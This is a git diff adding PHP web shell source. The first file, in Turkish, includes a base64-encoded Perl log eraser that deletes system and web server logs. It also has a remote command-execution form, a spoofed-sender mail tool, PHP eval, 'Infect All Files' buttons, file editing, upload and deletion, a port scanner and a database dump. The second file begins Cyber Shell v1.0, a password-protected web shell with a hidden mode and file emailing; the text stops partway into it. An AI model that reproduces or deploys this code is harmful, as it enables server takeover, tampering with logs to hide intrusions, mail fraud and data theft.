VlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJpeDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9ldGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwiL2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBvcGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJpYW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJvci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9sb2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAgIEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUvbG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAgPSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xvZ1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXggPSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Ivc3Bvb2wvbHAvbG9nXCIsIFwiL3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwgXCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9nXCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBhaXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1wXCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3VyaXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwiLCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIvdmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dcIiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dcIiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAgICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2FmL3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxpbnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3NoX2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jvb3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwiL3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2FwYWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZlcmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9nL3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9mdHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBcIi9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBcIi92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhvcml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25ld3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNlXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9yc1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRfbG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwiL3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIpDQogICAgICAgICB9DQogICAgICAgICANCiAgIA==");
+$openp = fopen("logseraser.pl", "w+")or die("Error");
+fwrite($openp, $erase)or die("Error");
+fclose($openp);
+$aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
+unlink("logseraser.pl");
+echo "</textarea>";
+}
+
+if(isset($_POST['commex']))
+{
+echo "<tr><td>
+<center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
+        <input name=cmd size=20 type=text> 
+        <select name=functionz>
+          <option>passthru</option>
+          <option>popen</option>
+          <option>exec</option>
+          <option>shell_exec</option>
+          <option>system</option>
+        </select><br><input type='submit' name='cmdex' value='Enter'></table>";
+   }
+   if(isset($_POST['cmdex']))
+   { echo "<tr><td>";
+   switch (@$_POST['functionz']) {
+	case "system":
+	system(stripslashes($_POST['cmd']));
+	
+	break;
+	case "popen":
+	$handle = popen($_POST['cmd'].' 2>&1', 'r');
+	echo "'$handle'; " . gettype($handle) . "\n";
+	$read = fread($handle, 2096);
+	echo $read;
+	pclose($handle);
+	
+	break;
+	case "shell_exec":
+	shell_exec(stripslashes($_POST['cmd']));
+	
+
+	break;
+	case "exec":
+	exec(stripslashes($_POST['cmd']));
+	
+	break;
+	case "passthru":
+	passthru(stripslashes($_POST['cmd']));
+	
+	}
+	}
+
+elseif(isset($_POST['mail'])) 
+{
+echo "<form method='post' action=''>
+<td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylı]</font></center>
+<center><font face='Verdana' size='1'>Kime:<br>
+<input type='text' size='19' name='mto'><br>
+Kimden:<br>
+<input type='text' size='19' name='mfrom'><br>
+Konu:<br>
+<input type='text' size='19' name='mobj'><br>
+Mesaj:<br>
+<textarea name='mtext' cols=20 rows=4></textarea><br>
+<br><input type='submit' value='Yolla' name='senm'>
+</form></table><br>";}
+if(isset($_POST['senm'])) 
+{
+//Mail With HTML   <- webcheatsheet.com
+$to = $_POST['mto'];
+$subject = $_POST['mobj'];
+$contentz = $_POST['mtext']."<!--";
+$random_hash = md5(date('r', time()));
+$headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
+$headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
+ob_start(); 
+?>
+
+--PHP-alt-<?php echo $random_hash; ?> 
+Content-Type: text/html; charset="iso-8859-1"
+Content-Transfer-Encoding: 7bit
+
+<?  echo "$contentz"; ?>
+--PHP-alt-<?php echo $random_hash; ?>--
+<?
+$message = ob_get_clean();
+
+$mail = @mail( $to, $subject, $message, $headers );
+
+if($mail) { echo "<br><td valign=top>
+<center><font color='green' size='1'>Mail Sent</font></center></table>"; }
+else { echo "<br><td valign=top>
+<center><font color='red' size='1'>Error</font></center></table>"; }
+}
+
+elseif(isset($_POST['encoder'])) { 
+//Encoder
+echo "<form method='post' action=''><td valign=top>
+<center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>"; 
+}
+if(isset($_POST['encode'])) { echo "<td valign=top>
+<center><font face='Verdana' size='1'>
+MD5:   &nbsp;&nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".md5($_POST['encod'])."'><br>
+Sha1:  &nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
+Crc32: &nbsp;&nbsp;&nbsp;<input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
+Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
+Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
+
+//File List
+echo "</table><table width=100%><tr><td>
+<center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
+<center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
+<font size='1'>
+<td valign=top><font face='Verdana' size='2'><b>Dosya Adı :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
+</table></center>"; 
+
+echo "
+<br>
+<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
+<center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
+if(!isset($phpeval))
+{
+echo "
+   <form method='post' action=''>
+   <textarea name=php_eval cols=100 rows=5></textarea><br>
+   <input type='submit' value='Calistir!'>
+   </form>
+";
+}
+
+if(isset($phpeval)) {
+echo "
+<form method='post' action=''>
+<textarea name=php_eval cols=100 rows=10>";
+$wr = '"';
+ $eval = @str_replace("<?","",$phpeval);
+ $eval = @str_replace("?>","",$phpeval);
+ @eval($eval);
+echo "</textarea><br><input type='submit' value='Calistir!'></form>";
+
+}
+echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
+if(isset($textzz)) { echo $textzz; }
+if(isset($textz0)) { echo $textz0; }
+echo "</center></form></td></tr><tr><td>
+<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
+<form method='post' action=''>
+<input type='text' name='editfile' value=".$dir.">
+<input type='submit' value='Go' name='doedit'>
+</form>";
+// Edit Files n3xpl0rer
+if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
+{
+$file = $_POST['editfile'];
+$content = file_get_contents($file);
+echo "<form action='' method='post'><center>
+<input type='hidden' name='editfile' value='".$file."'>
+<textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
+}
+if(isset($_POST['edit'])) {
+$file = $_POST['editfile'];
+echo  $file."<br />";
+$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
+fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
+fclose($fh);
+echo "Done.</td></tr>";
+}
+echo "
+</table>
+<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
+<tr>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
+<form name='directory' method='post' action=''>
+<input type='text' name='dir' value=$dir>
+<input type='submit' value='Go'>
+</form></td><td>
+<center><b><font size='2' face='Verdana'> Port Tarayıcı <br></font></b>
+   <form name='scanner' method='post'>
+   <input type='text' name='host' value='127.0.0.1' >
+   <select name='protocol'>
+   <option value='tcp'>tcp</option>
+   <option value='udp'>udp</option>
+   </select>
+   <input type='submit' value='Portları TARA'>
+   </form>
+";
+if(isset($host) && isset($proto))
+{
+echo "<font size='2' face='Verdana'>Open Ports:";
+
+for($current = 0; $current <= 23; $current++)
+{
+$currents = $myports[$current];
+
+$service = getservbyport($currents, $proto);
+
+
+// Try to connect to port
+$result = fsockopen($host, $currents, $errno, $errstr, 1);
+
+// Show results
+if($result)
+{
+echo "$currents, ";
+}
+
+
+}
+}
+
+echo "</font>
+</td></tr>
+
+<tr>
+<td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
+   <form method='post' action='' enctype='multipart/form-data'>
+   <input type='hidden' name='dare' value=$dir>
+   <input type='file' name='ffile'>
+   <input type='submit' name='ok' value='Upload!'>
+   </center>   
+   </form>
+</td>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
+   <form method='post' action=''>
+   <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayı Sil' name='deletfilez'>
+   </center>
+   </form>
+</td></tr>
+<tr>
+<td valign=top>
+ 
+<center><b><font size='2' face='Verdana'>Klasör Oluştur<br></font></b>
+   <form method='post' action=''>
+   <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluştur'>
+   </center>
+   </form>
+</td>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>
+   <form method='post' action=''>
+   <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
+   </center>
+   </form>
+</td></tr>
+<tr>
+<td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Dosya Oluştur:<br></font></b>
+   <form method='post' action=''>
+   <input type='hidden' name='darezz' value=$dir>
+   <font size='1' face='Verdana'>ADI:</font><br>
+   <input type='text' name='names' size='30'><br>
+   <font size='1' face='Verdana'>Kodu:</font><br>
+   <textarea rows='16' cols='30' name='source'></textarea><br>
+   <input type='submit' value='Upload'>
+   </center>
+   </form>
+</td>
+<td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Database<br></font></b>
+   <form method='post' action=''>
+   <font size='1' face='Verdana'>Username: - Password:</font><br>
+   <input type='text' name='user' size='10'>
+   <input type='text' name='passd' size='10'><br>
+   <font size='1' face='Verdana'>Host:</font><br>
+   <input type='text' name='host' value='localhost'><br>
+   <font size='1' face='Verdana'>DB Name:</font><br>
+   <input type='text' name='db'><br>
+   <font size='1' face='Verdana'>Sorgu:</font><br>
+   <textarea rows='10' cols='30' name='query'></textarea><br>
+   <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
+   </center>
+   </form>
+</td> </tr>
+
+</table>
+</table>
+<br />
+<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
+<tr>
+<td valign=top>
+<center><b><font size='1' face='Verdana'>
+KingDefacer@msn.com
+</center></font></td></tr>
+</body>
+</html>";
+
+?>
diff --git a/php/cybershell.php b/php/cybershell.php
new file mode 100644
index 0000000..a008f87
--- /dev/null
+++ b/php/cybershell.php
@@ -0,0 +1,1033 @@
+<?
+/***************************************************************************
+ *                           Cyber Shell (v 1.0)
+ *                            -------------------
+ *   copyright            : (C) Cyber Lords, 2002-2006
+ *   email                : pixcher@mail.ru
+ *
+ *   http://www.cyberlords.net 
+ *  
+ *   Coded by Pixcher
+ *   Lite version of php web shell 
+ ***************************************************************************/
+
+/***************************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ***************************************************************************/
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+/****************************** Options ************************************/
+#ïàğîëü íà àâòîğèçàöèş 
+$aupassword="test";
+#åñëè ïàğîëü óñòàíîâëåí ïğè $hiddenmode="true", òî ê ñêğèïòó íóæíî îáğàùàòüñÿ ñ ïàğàìåòğîì pass=ïàğîëü , íàïğèìåğ shell.php?pass=mysecretpass
+$hiddenmode="false";
+#e-mail íà êîòîğûé ñêèäûâàşòñÿ âûáğàííûå ôàéëû
+$email="test@mail.ru";
+/***************************************************************************/
+$style="
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
